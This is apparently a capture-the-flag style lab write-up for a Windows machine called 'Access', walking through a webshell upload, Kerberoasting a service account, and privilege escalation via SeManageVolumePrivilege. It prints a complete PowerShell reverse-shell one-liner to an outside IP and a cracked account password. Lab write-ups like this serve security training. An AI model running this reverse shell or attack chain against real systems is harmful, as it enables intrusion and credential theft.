Skip to content

Access 🔸

Enumeration

Web server shows a page about the event.

Initial Access

We can upload images, so we can upload a webshell; change the extension by intercepting the request and change it from .png to .php...

File will be in /uploads (discovered with feroxbuster).

Now let's try to get a reverse shell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.220',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Privilege Escalation

Transfer sharphound and get the zip. See the data in bloodhound.

User svc_mssql is kerberoastable.

We don't have svc_apache password, so we have to execute the attack on the target. Transfer rubeus there.

Using hashcat:

We have svc_mssql:trustno1

To execute commands as this user, we need runas.

Using -Remote, we can redirect the shell to a remote one.

This user has SeManageVolumePrivilege.

Using https://github.com/CsEnox/SeManageVolumeExploit

Download and transfer the exe.

Now, following the readme, generate a malicious DLL with msfvenom and transfer it to C:\windows\system32\spool\drivers\x64\3\PrintConfig.dll

Start a listener and trigger it.

Post Exploitation